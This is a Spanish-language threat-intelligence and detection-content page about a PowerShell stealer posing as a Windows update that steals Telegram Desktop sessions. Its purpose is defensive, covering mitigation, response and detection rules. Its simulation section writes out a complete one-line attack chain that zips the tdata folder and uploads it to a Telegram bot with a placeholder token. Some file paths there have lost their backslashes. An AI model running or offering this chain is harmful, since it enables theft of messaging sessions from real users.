Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Un script malicioso de PowerShell alojado en Pastebin se hace pasar por una actualización de Windows mientras roba los datos de sesión de Telegram Desktop de los sistemas infectados. El script reúne detalles del host, comprime el tdata directorio y exfiltra el archivo resultante a través de la API del Bot de Telegram. Los investigadores también identificaron un ladrón web relacionado diseñado para capturar las claves de autenticación de Telegram Web y enviarlas a un recolector HTTP local. Ambas herramientas dependen del mismo bot de Telegram para notificaciones, aunque la evidencia disponible sugiere que permanecen en una etapa de prueba en lugar de un uso operativo amplio.
Investigación
Los analistas recuperaron dos variantes de scripts alojados en Pastebin, descubrieron tokens de bots codificados de forma rígida e identificaciones de chat, y reconstruyeron el proceso completo de exfiltración. Durante la ejecución, el script termina Telegram.exe, archiva el tdata carpeta y carga el archivo ZIP a través del método sendDocument de la API del bot. La telemetría del bot también expuso un ladrón web separado que transmitió claves de autenticación MTProto a un recolector privado alojado en 192.168.137.131:5000. En general, los hallazgos apuntan a pruebas funcionales y validación en lugar de a una campaña madura y a gran escala.
Mitigación
Las organizaciones que no requieran Telegram deberían bloquear el tráfico saliente a api.telegram.org y la infraestructura relacionada de Telegram. Los defensores deberían monitorizar PowerShell para el uso de Invoke-RestMethod or WebClient dirigido a los puntos finales de la API de Telegram y detectar archivos ZIP creados en directorios temporales que contengan tdata contenido. Cualquier token de bot expuesto debería ser revocado inmediatamente y reemplazado para prevenir un uso indebido futuro.
Respuesta
Si se descubre el script, termina el proceso de PowerShell asociado y elimina cualquier diag.zip archivos generados. Revoca todas las sesiones activas de Telegram vinculadas a la cuenta afectada y habilita la autenticación de dos factores para reducir el riesgo de acceso continuo. El token del bot debería ser cambiado, y el chat del bot vinculado debería revisarse por evidencia de datos exfiltrados. Una investigación forense más amplia también debería confirmar si se recopilaron credenciales adicionales o material de sesión.
"graph TB %% Definiciones de clase classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffeb99 %% Nodos de acción action_user_exec["<b>Acción</b> – <b>T1204 Ejecución de Usuario</b><br/>La víctima ejecuta script de PowerShell llamado Actualización de Telemetría de Windows<br/><b>Técnica</b> T1036 Suplantación"] class action_user_exec action action_powershell_interp["<b>Acción</b> – <b>T1059.001 PowerShell</b><br/>Script ejecutado a través del intérprete de PowerShell"] class action_powershell_interp action action_sysinfo["<b>Acción</b> – <b>T1082 Descubrimiento de Información del Sistema</b><br/>Recopila USERNAME, COMPUTERNAME e IP pública"] class action_sysinfo action action_collect_tdata["<b>Acción</b> – <b>T1005 Datos del Sistema Local</b><br/>Ubica directorios tdata de Telegram Desktop y termina Telegram.exe"] class action_collect_tdata action action_archive["<b>Acción</b> – <b>T1560.001 Archivo a través de Utilidad</b><br/>Compressu2011Archive crea diag.zip con archivos recopilados"] class action_archive action action_delete["<b>Acción</b> – <b>T1070.004 Eliminación de Archivos</b><br/>Elimina diag.zip después de subirlo"] class action_delete action action_exfiltration["<b>Acción</b> – <b>T1020 Exfiltración Automatizada</b><br/>Usa el endpoint de sendDocument del Bot de Telegram para exfiltrar el archivo zip<br/><b>Subtécnicas</b> T1041 Exfiltración a través de Canal C2, T1567 Exfiltración a través de Servicio Web, T1071.001 Protocolos Web"] class action_exfiltration action action_session_hijack["<b>Acción</b> – <b>T1563 Secuestro de Sesión de Servicio Remoto</b><br/>Reproduce claves de autorización MTProto de tdata recolectado"] class action_session_hijack action action_steal_cookies["<b>Acción</b> – <b>T1550.004 Uso de Material de Autenticación Alternativo</b><br/>Roba cookies de sesión de Telegram Web del almacenamiento del navegador y los reenvía al recolector"] class action_steal_cookies action %% Nodos de herramienta/proceso tool_powershell["<b>Herramienta</b> – <b>Nombre</b>: PowerShell<br/><b>Descripción</b>: Shell de línea de comandos de Windows y lenguaje de scripting"] class tool_powershell tool tool_compress["<b>Herramienta</b> – <b>Nombre</b>: Compressu2011Archive<br/><b>Descripción</b>: Cmdlet de PowerShell para crear archivos ZIP"] class tool_compress tool process_telegram["<b>Proceso</b> – <b>Nombre</b>: Telegram.exe<br/><b>Descripción</b>: Cliente de escritorio para mensajería de Telegram"] class process_telegram process tool_telegram_bot["<b>Herramienta</b> – <b>Nombre</b>: API del Bot de Telegram<br/><b>Descripción</b>: Endpoint sendDocument usado para exfiltración de datos"] class tool_telegram_bot tool %% Conexiones que muestran el flujo action_user_exec –>|dispara| action_powershell_interp action_powershell_interp –>|usa| tool_powershell action_powershell_interp –>|ejecuta| action_sysinfo action_sysinfo –>|recopila| action_collect_tdata action_collect_tdata –>|termina| process_telegram action_collect_tdata –>|usa| tool_compress action_collect_tdata –>|crea| action_archive action_archive –>|usa| tool_compress action_archive –>|produce| action_exfiltration action_exfiltration –>|usa| tool_telegram_bot action_exfiltration –>|elimina| action_delete action_delete –>|limpia| action_exfiltration action_exfiltration –>|habilita| action_session_hijack action_session_hijack –>|facilita| action_steal_cookies "
Flujo de Ataque
Detecciones
Llama a Métodos Sospechosos de .NET desde Powershell (a través de powershell)
Ver
Posible Abuso de Telegram Como Canal de Comando y Control (a través de dns_query)
Ver
Intento de Comunicación con Dominio de Búsqueda de IP Posible (a través de dns)
Ver
IOCs (IP Fuente) para detectar: Dentro de un ladrón de sesiones de Telegram: Cómo un script de PowerShell alojado en Pastebin apunta a sesiones de escritorio y web
Ver
IOCs (IP Destino) para detectar: Dentro de un ladrón de sesiones de Telegram: Cómo un script de PowerShell alojado en Pastebin apunta a sesiones de escritorio y web
Ver
Detección de ladrón de sesiones de Telegram a través de script de PowerShell [Conexión de Red de Windows]
Ver
Actualización de Telemetría de Windows – Ladrón de Sesiones de Telegram [Powershell de Windows]
Ver
Ejecución de Simulación
Prerrequisito: La verificación previa de Telemetría y Línea Base debe haber pasado.
Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTP identificados y buscar generar exactamente la telemetría que se espera en la lógica de detección.
-
Narrativa de Ataque y Comandos:
- Reconocimiento: El atacante consulta
api.ipify.orgpara descubrir la IP pública del host (utilizada luego para registro). - Interrupción del Servicio: Detiene el proceso legítimo de Telegram Desktop para asegurar que los archivos no estén bloqueados.
- Recolección de Datos: Copia recursivamente el
tdatadirectorio de Telegram Desktop (archivos de sesión) a una ubicación temporal. - Archivar: Comprime los datos recolectados en
diag.zip. - Exfiltración: Envía el archivo al Bot de Telegram malicioso mediante
Invoke‑RestMethod. - Limpieza: Elimina el archivo temporal y opcionalmente reinicia Telegram.
- Reconocimiento: El atacante consulta
-
Script de Prueba de Regresión: Ejecuta la cadena completa de ataque en una sola línea de comando de PowerShell (coincidiendo con la regla de detección).
# Actualización de Telemetría de Windows – Ladrón de Sesiones de Telegram $ip = (Invoke-RestMethod -Uri "http://api.ipify.org").Content; Stop-Process -Name Telegram -Force; $src = "$env:APPDATATelegram Desktoptdata"; $dst = "$env:TEMPdiag"; Copy-Item -Path $src -Destination $dst -Recurse -Force; Compress-Archive -Path $dst* -DestinationPath "$env:TEMPdiag.zip" -Force; $botToken = "123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11"; $chatId = "987654321"; Invoke-RestMethod -Uri "https://api.telegram.org/bot$botToken/sendDocument?chat_id=$chatId" -Method Post -InFile "$env:TEMPdiag.zip" -ContentType "multipart/form-data"; Remove-Item -Path "$env:TEMPdiag.zip" -Force; -
Comandos de Limpieza: Restaura el entorno a su estado original.
# Reinicia Telegram (si se desea) y elimina los datos copiados Start-Process -FilePath "$env:ProgramFilesTelegram DesktopTelegram.exe" -WindowStyle Hidden; Remove-Item -Path "$env:TEMPdiag" -Recurse -Force;